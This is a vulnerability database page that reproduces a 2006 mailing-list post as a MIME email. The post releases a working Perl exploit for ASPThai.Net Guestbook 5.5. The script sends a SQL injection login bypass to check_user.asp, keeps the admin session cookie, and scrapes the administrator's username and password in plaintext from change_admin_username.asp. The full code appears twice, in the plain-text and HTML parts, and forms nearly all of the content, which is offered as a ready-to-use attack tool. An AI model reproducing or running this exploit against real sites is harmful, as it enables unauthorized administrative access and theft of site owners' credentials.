Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

ASPThai.NetGuestbook.pl.txt

🗓️ 08 Feb 2006 00:00:00Reported by MurderSkillzType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 20 Views

SQL Injection Exploit in ASPThai.Net Guestbook v5.5 "Admin.asp" grants plaintext user and pas

Show more
Code
`------=_Part_9669_22649246.1139201383091  
Content-Type: text/plain; charset=ISO-8859-1  
Content-Transfer-Encoding: quoted-printable  
Content-Disposition: inline  
  
I MurderSkillz from g00ns.net found a vuln "SQL Injection Exploit for  
ASPThai.Net Guestbook <=3D 5.5 and POSSIBLY higher" The sql injection takes  
place in admin.asp. IF injected with special characters into the login it  
will grant u with admin..BUT we wrote wrote some code to grab plaintext use=  
r  
and pass..here is the code  
  
  
#!/usr/bin/perl  
# SQL Injection Exploit for ASPThai.Net Guestbook <=3D 5.5  
#(And possible higher could not find a site to test it on)  
# This exploit shows the username of the administrator and the password In  
plain text  
# Bug Found by muderskillz Coded by Zodiac  
# Shouts to cijfer,uid0,|n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and  
anyone else I forgot.  
# http://exploitercode.com/ http://www.g00ns.net  
#irc.g00ns.net #g00ns email =3D [email protected]  
#(c) 2006  
  
use LWP::UserAgent;  
use HTTP::Cookies;  
  
  
$Server =3D $ARGV[0];  
  
if($Server =3D~m/http/g)  
{  
$Server=3D~ 'http://$Server';  
print  
}  
  
else {  
print $error;  
}  
  
  
  
  
if(!$Server) {usage();exit() ;}  
  
head();  
  
  
  
print "\r\nGrabbing Username And Password\r\n\n";  
  
  
  
#Login's and stores a cookie to view admin panel later  
  
  
$xpl =3D LWP::UserAgent->new() or die;  
$cookie_jar =3D HTTP::Cookies->new();  
  
$xpl->agent('g00ns');  
$xpl->cookie_jar($cookie_jar);  
  
$res =3D $xpl->post(  
$Server.'check_user.asp',  
Content =3D> [  
  
  
'txtUserName' =3D> '\' or \'%67%30%30%6e%73\'=3D\'%67%30%30%6e%73',  
'txtUserPass' =3D> '\' or \'%67%30%30%6e%73\'=3D\'%67%30%30%6e%73',  
'Submit' =3D> '-=3D Login =3D-',  
],  
);  
  
  
  
# Create a request  
my $req =3D HTTP::Request->new(GET =3D>  
  
$Server.'change_admin_username.asp'  
  
);  
  
$req->header('Referer', $Server.'admin_menu.asp');  
  
  
  
my $res =3D $xpl->request($req);  
  
$info=3D $res->content;  
  
if($info =3D~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/)  
{  
die "Error Connecting...\r\n";  
}  
  
  
  
  
#Check the outcome of the response  
  
  
  
$info=3D~m/(value=3D\")(\n+|\w+|\W+)/g;  
$User =3D $2;  
$info=3D~m/(value=3D\")(\n+|\w+|\W+)/g;  
$Pass=3D $2;  
  
  
print "UserName:$User\r\nPassword:$Pass\r\n";  
  
  
  
sub head()  
{  
print  
"\n=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";  
print "* ASPThai.Net Guestbook version 5.5 SQL Injection by  
www.g00ns.net*\r\n";  
print  
"=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";  
}  
sub usage()  
{  
head();  
print " Usage: Thaisql.pl <Site> \r\n\n";  
print " <Site> - Full path to Guestbook e.g.  
http://www.site.com/guestbook/\r\n";  
print  
"=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";  
print " -=3DCoded by Zodiac, Bug Found by MurderSkillz=3D-\r\n";  
print "www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n";  
print  
"=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";  
exit();  
}  
  
  
  
its been out for like 2 days now..  
  
------=_Part_9669_22649246.1139201383091  
Content-Type: text/html; charset=ISO-8859-1  
Content-Transfer-Encoding: quoted-printable  
Content-Disposition: inline  
  
<div>I MurderSkillz from <a href=3D"http://g00ns.net">g00ns.net</a> found a=  
vuln "SQL Injection Exploit for ASPThai.Net Guestbook <=3D 5.5 and=  
POSSIBLY higher" The sql injection takes place in admin.asp. IF injec=  
ted with special characters into the login it will grant u with admin..BUT =  
we wrote wrote some code to grab plaintext user and pass..here is the code  
</div>  
<div>&nbsp;</div>  
<div>  
<p>#!/usr/bin/perl<br># SQL Injection Exploit for ASPThai.Net Guestbook &lt=  
;=3D 5.5&nbsp; <br>#(And possible higher could not find a site to test it o=  
n)<br># This exploit shows the username of the administrator and the passwo=  
rd In plain text  
<br># Bug Found by muderskillz Coded by Zodiac<br># Shouts to cijfer,uid0,|=  
n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and anyone else I forgot.<br># <=  
a href=3D"http://exploitercode.com/">http://exploitercode.com/</a> <a href=  
=3D"http://www.g00ns.net/">  
http://www.g00ns.net</a> <br>#irc.g00ns.net #g00ns&nbsp; email =3D <a href=  
=3D"mailto:[email protected]">[email protected]</a><br>#(c) 2006</p>  
<p>use LWP::UserAgent;<br>use HTTP::Cookies;</p>  
<p><br>$Server =3D $ARGV[0];</p>  
<p>if($Server =3D~m/http/g)<br>{<br>$Server=3D~ 'http://$Server';<br>print =  
<br>}</p>  
<p>else {<br>&nbsp; print $error;<br>}</p>  
<p>&nbsp;</p>  
<p><br>if(!$Server) {usage();exit() ;}</p>  
<p>head();</p>  
<p>&nbsp;</p>  
<p>print "\r\nGrabbing Username And Password\r\n\n";</p>  
<p>&nbsp;</p>  
<p>#Login's and stores a cookie to view admin panel later</p>  
<p><br>&nbsp;$xpl =3D LWP::UserAgent->new() or die;<br>&nbsp;$cookie_jar=  
=3D HTTP::Cookies->new();</p>  
<p>&nbsp;$xpl->agent('g00ns');<br>&nbsp;$xpl->cookie_jar($cookie_jar)=  
;</p>  
<p>&nbsp;$res =3D $xpl->post(<br>&nbsp;$Server.'check_user.asp',<br>&nbs=  
p;Content =3D> [ </p>  
<p><br>&nbsp;'txtUserName' =3D> '\' or \'%67%30%30%6e%73\'=3D\'%67%30%30=  
%6e%73', <br>&nbsp;'txtUserPass' =3D> '\' or \'%67%30%30%6e%73\'=3D\'%67=  
%30%30%6e%73',<br>&nbsp;'Submit' =3D> '-=3D Login =3D-',<br>&nbsp;],<br>=  
&nbsp;);</p>  
<p>&nbsp;</p>  
<p># Create a request<br>my $req =3D HTTP::Request->new(GET =3D> </p>  
<p>$Server.'change_admin_username.asp'</p>  
<p>);</p>  
<p>$req->header('Referer', $Server.'admin_menu.asp');</p>  
<p>&nbsp;</p>  
<p>my $res =3D $xpl->request($req);</p>  
<p>$info=3D $res->content;</p>  
<p>if($info =3D~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/) <br>=  
{ <br>&nbsp;die "Error Connecting...\r\n"; <br>}</p>  
<p>&nbsp;</p>  
<p><br>#Check the outcome of the response</p>  
<p>&nbsp;</p>  
<p>$info=3D~m/(value=3D\")(\n+|\w+|\W+)/g;<br>$User =3D $2;<br>$info=  
=3D~m/(value=3D\")(\n+|\w+|\W+)/g;<br>$Pass=3D $2;</p>  
<p><br>print "UserName:$User\r\nPassword:$Pass\r\n";</p>  
<p>&nbsp;</p>  
<p>sub head()<br>&nbsp;{<br>&nbsp;print "\n=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";<br>&nbsp;print "* ASPT=  
hai.Net Guestbook version 5.5 SQL Injection by <a href=3D"http://www.g00ns.=  
net/">  
www.g00ns.net</a> *\r\n";&nbsp;&nbsp; <br>&nbsp;print "=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";<br>&nbsp;=  
}<br>sub usage()<br>&nbsp;{<br>&nbsp;head();<br>&nbsp;print " Usage: T=  
haisql.pl <Site>&nbsp; \r\n\n";  
<br>&nbsp;print " <Site> - Full path to Guestbook e.g. <a href=  
=3D"http://www.site.com/guestbook/">http://www.site.com/guestbook/</a> \r\n=  
";<br>&nbsp;print "=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D\r\n";  
<br>&nbsp;print "&nbsp;&nbsp; -=3DCoded by Zodiac, Bug Found by Murder=  
Skillz=3D-\r\n";<br>&nbsp;print "<a href=3D"http://www.exploiterc=  
ode.com/">www.exploitercode.com</a> <a href=3D"http://www.g00ns.net/">www.g=  
00ns.net</a> <a href=3D"http://irc.g00ns.net">  
irc.g00ns.net</a> #g00ns\r\n";<br>&nbsp;print "=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";<br>&nbsp;exit();<b=  
r>&nbsp;}</p>  
<p>&nbsp;</p>  
<p>its been out for like 2 days now..<br>&nbsp;</p></div>  
  
------=_Part_9669_22649246.1139201383091--  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
08 Feb 2006 00:00Current
7.4High risk
Vulners AI Score7.4
sql injectionaspthai.netguestbook
20
.json
Report